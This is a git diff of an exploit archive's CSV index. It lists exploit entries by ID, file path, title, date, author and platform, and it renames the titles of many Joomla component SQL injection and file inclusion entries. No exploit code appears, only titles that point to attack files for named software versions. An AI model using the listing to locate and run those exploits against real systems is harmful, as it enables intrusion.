diff --git a/files.csv b/files.csv
index 9ccadff5f..1ae0e3ea7 100755
--- a/files.csv
+++ b/files.csv
@@ -12735,9 +12735,9 @@ id,file,description,date,author,platform,type,port
 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0
 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0
 14495,platforms/php/webapps/14495.txt,"Joomla! Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0
-14499,platforms/php/webapps/14499.txt,"Joomla! Component PBBooking 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0
+14499,platforms/php/webapps/14499.txt,"Joomla! Component 'com_pbbooking' 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0
 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0
-14501,platforms/php/webapps/14501.txt,"Joomla! Component SimpleShop (com_SimpleShop) - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0
+14501,platforms/php/webapps/14501.txt,"Joomla! Component 'com_SimpleShop' - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0
 14502,platforms/php/webapps/14502.txt,"Joomla! Component com_beamospetition - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0
 14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local,0
 14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0
@@ -12748,13 +12748,13 @@ id,file,description,date,author,platform,type,port
 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow (1)",2010-08-02,s-dz,windows,local,0
 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service",2010-07-31,s-dz,windows,dos,0
 14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service",2010-07-31,s-dz,windows,dos,0
-14518,platforms/php/webapps/14518.txt,"Joomla! Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0
+14518,platforms/php/webapps/14518.txt,"Joomla! Component 'com_spielothek' 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0
 14519,platforms/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7)",2010-07-31,Dr_IDE,windows,remote,0
 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0
 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0
 14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0
 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - modules.php SQL Injection",2010-08-02,secret,php,webapps,0
-14530,platforms/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0
+14530,platforms/php/webapps/14530.txt,"Joomla! Component 'com_camelcitydb2' 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0
 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting",2010-08-02,"Juan Manuel Garcia",php,webapps,0
 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0
 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - 'aswFW.sys' Kernel Driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0
@@ -12777,14 +12777,14 @@ id,file,description,date,author,platform,type,port
 14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0
 14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id=' SQL Injection",2010-08-05,secret,php,webapps,0
 14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusion",2010-08-05,eidelweiss,php,webapps,0
-14569,platforms/php/webapps/14569.txt,"Joomla! Component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0
+14569,platforms/php/webapps/14569.txt,"Joomla! Component 'com_cgtestimonial' 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0
 14562,platforms/php/webapps/14562.html,"Open Blog 1.2.1 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0
 14573,platforms/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' Null Pointer Dereference Remote Denial of Service",2010-08-07,"Tomas Hoger",linux,dos,0
-14570,platforms/php/webapps/14570.txt,"Joomla! Component com_neorecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
+14570,platforms/php/webapps/14570.txt,"Joomla! Component 'com_neorecruit' 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0
 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0
 14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray",2010-08-08,"ThE g0bL!N",windows,remote,0
@@ -12794,14 +12794,14 @@ id,file,description,date,author,platform,type,port
 14584,platforms/windows/dos/14584.py,"QQ Computer Manager - 'TSKsp.sys' Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0
 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0
 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote,0
-14598,platforms/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0
+14598,platforms/php/webapps/14598.txt,"Joomla! Component 'com_teams' - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0
 14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0
 14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,php,webapps,0
-14592,platforms/php/webapps/14592.txt,"Joomla! Component Yellowpages - SQL Injection",2010-08-09,"al bayraqim",php,webapps,0
+14592,platforms/php/webapps/14592.txt,"Joomla! Component 'com_yellowpages' - SQL Injection",2010-08-09,"al bayraqim",php,webapps,0
 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
 14594,platforms/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service",2010-08-09,"Jon Oberheide",linux,dos,0
 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,php,webapps,0
-14596,platforms/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0
+14596,platforms/php/webapps/14596.txt,"Joomla! Component 'com_amblog' 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0
 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0
 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0
 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit",2010-08-10,sud0,windows,remote,0
@@ -12849,9 +12849,9 @@ id,file,description,date,author,platform,type,port
 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
 14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
-14655,platforms/php/webapps/14655.txt,"Joomla! Component com_equipment - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
-14656,platforms/php/webapps/14656.txt,"Joomla! Component Jgrid 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
-14659,platforms/php/webapps/14659.txt,"Joomla! Component OnGallery - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0
+14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
+14656,platforms/php/webapps/14656.txt,"Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
+14659,platforms/php/webapps/14659.txt,"Joomla! Component 'com_ongallery' - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0
 14666,platforms/windows/dos/14666.txt,"Microsoft Windows - nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0
 14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous ",windows,local,0
 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous ",windows,local,0
@@ -12876,14 +12876,14 @@ id,file,description,date,author,platform,type,port
 14690,platforms/windows/dos/14690.pl,"Fennec 1.2 Beta 3 - Denial of Service",2010-08-19,d4rk-h4ck3r,windows,dos,0
 14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
 14693,platforms/windows/local/14693.py,"Microsoft Word - Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0
-14707,platforms/php/webapps/14707.txt,"Joomla! Component com_Fabrik - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
-14694,platforms/php/webapps/14694.txt,"Joomla! Component com_extcalendar - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
+14707,platforms/php/webapps/14707.txt,"Joomla! Component 'com_Fabrik' - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
+14694,platforms/php/webapps/14694.txt,"Joomla! Component 'com_extcalendar' - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
 14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service",2010-08-20,PASSEWORD,windows,dos,0
 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous ",windows,shellcode,0
 14698,platforms/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 - '.m3u' Denial of Service",2010-08-20,b0telh0,windows,dos,0
 14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - '.mp3' Denial of Service",2010-08-20,"Praveen Darshanam",windows,dos,0
-14702,platforms/php/webapps/14702.txt,"Joomla! Component com_zina - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0
-14703,platforms/php/webapps/14703.txt,"Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0
+14702,platforms/php/webapps/14702.txt,"Joomla! Component 'com_zina' - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0
+14703,platforms/php/webapps/14703.txt,"Joomla! Component 'com_biblioteca' 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0
 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0
 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex Interrupting) Denial of Service",2010-08-21,l3D,windows,dos,0
 14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
@@ -12894,7 +12894,7 @@ id,file,description,date,author,platform,type,port
 14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0
 14716,platforms/php/webapps/14716.txt,"AneCMS - /registre/next SQL Injection",2010-08-23,Sweet,php,webapps,0
 14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0
-14718,platforms/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
+14718,platforms/php/webapps/14718.txt,"Joomla! Component 'com_zoomportfolio' - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0
 14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
 14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0
@@ -12963,7 +12963,7 @@ id,file,description,date,author,platform,type,port
 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0
 14801,platforms/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0
 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0
-14811,platforms/php/webapps/14811.txt,"Joomla! Component com_remository - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0
+14811,platforms/php/webapps/14811.txt,"Joomla! Component 'com_remository' - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0
 14808,platforms/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
 14810,platforms/php/webapps/14810.txt,"Gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
@@ -12990,8 +12990,8 @@ id,file,description,date,author,platform,type,port
 14840,platforms/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial of Service",2010-08-30,"CwG GeNiuS",windows,dos,0
 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0
 14843,platforms/windows/dos/14843.txt,"Apple QuickTime - '_Marshaled_pUnk' Backdoor Parameter Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0
-14845,platforms/php/webapps/14845.txt,"Joomla! Component com_picsell - Local File Disclosure",2010-08-30,Craw,php,webapps,0
-14846,platforms/php/webapps/14846.txt,"Joomla! Component com_jefaqpro - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
+14845,platforms/php/webapps/14845.txt,"Joomla! Component 'com_picsell' - Local File Disclosure",2010-08-30,Craw,php,webapps,0
+14846,platforms/php/webapps/14846.txt,"Joomla! Component 'com_jefaqpro' - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0
 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0
 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0
@@ -13022,24 +13022,24 @@ id,file,description,date,author,platform,type,port
 14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0
 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - 'sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0
 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0
-14896,platforms/php/webapps/14896.txt,"Joomla! Component iJoomla! magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
+14896,platforms/php/webapps/14896.txt,"Joomla! Component 'com_magazine' 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
 14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0
 14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0
-14901,platforms/php/webapps/14901.txt,"Joomla! Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
-14902,platforms/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
+14901,platforms/php/webapps/14901.txt,"Joomla! Component 'com_clantools' 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
+14902,platforms/php/webapps/14902.txt,"Joomla! Component 'com_clantools' 1.2.3 - Multiple Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0
 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0
 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0
 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0
-14911,platforms/php/webapps/14911.sh,"Joomla! Component Gantry Framework 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
+14911,platforms/php/webapps/14911.sh,"Joomla! Component 'com_gantry' 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0
 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
 14915,platforms/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0
 14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0
 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
-14922,platforms/php/webapps/14922.txt,"Joomla! Component Aardvertiser 2.1 Free - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0
+14922,platforms/php/webapps/14922.txt,"Joomla! Component 'com_aardvertiser' 2.1 - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0
 14923,platforms/php/webapps/14923.txt,"WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0
 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps,0
 14925,platforms/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0
@@ -13060,12 +13060,12 @@ id,file,description,date,author,platform,type,port
 14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0
 14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0
 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0
-15443,platforms/php/webapps/15443.txt,"Joomla! Component RSform! 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
+15443,platforms/php/webapps/15443.txt,"Joomla! Component 'com_forme' 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0
 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - SEH Overflow",2010-09-09,"Abhishek Lyall",win_x86,local,0
 14962,platforms/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
-14964,platforms/php/webapps/14964.txt,"Joomla! Component com_jphone - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
+14964,platforms/php/webapps/14964.txt,"Joomla! Component 'com_jphone' - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0
 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
 14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0
@@ -13086,10 +13086,10 @@ id,file,description,date,author,platform,type,port
 14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash (PoC)",2010-09-13,SONIC,windows,dos,0
 14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0
 14992,platforms/windows/dos/14992.py,"RealPlayer - FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos,0
-14995,platforms/php/webapps/14995.txt,"Joomla! Component Mosets Tree 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps,0
+14995,platforms/php/webapps/14995.txt,"Joomla! Component 'com_mtree' 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps,0
 14996,platforms/php/webapps/14996.txt,"Storyteller CMS - (var) Local File Inclusion",2010-09-13,"BorN To K!LL",php,webapps,0
 14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,php,webapps,0
-14998,platforms/php/webapps/14998.txt,"Joomla! Component com_jgen - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
+14998,platforms/php/webapps/14998.txt,"Joomla! Component 'com_jgen' - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
 14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0
 15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0
 15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0
@@ -13119,7 +13119,7 @@ id,file,description,date,author,platform,type,port
 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0
 15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0
 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,php,webapps,0
-15040,platforms/php/webapps/15040.txt,"Joomla! Component com_restaurantguide - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
+15040,platforms/php/webapps/15040.txt,"Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0
 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,php,webapps,0
@@ -13127,7 +13127,7 @@ id,file,description,date,author,platform,type,port
 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0
 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,php,webapps,0
 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,php,webapps,0
-15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component com_elite_experts - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
+15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component 'com_elite_experts' - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0
 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow (PoC)",2010-09-19,The_UnKn@wn,linux,dos,0
 15056,platforms/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0
@@ -13151,8 +13151,8 @@ id,file,description,date,author,platform,type,port
 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0
 15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH Exploit (Metasploit)",2010-09-22,Madjix,windows,local,0
 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0
-15084,platforms/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0
-15085,platforms/php/webapps/15085.txt,"Joomla! Component com_ezautos - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
+15084,platforms/php/webapps/15084.txt,"Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0
+15085,platforms/php/webapps/15085.txt,"Joomla! Component 'com_ezautos' - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
 15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0
 15086,platforms/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution",2010-09-23,Abysssec,multiple,dos,0
 15088,platforms/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption",2010-09-23,Abysssec,windows,dos,0
@@ -13169,7 +13169,7 @@ id,file,description,date,author,platform,type,port
 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0
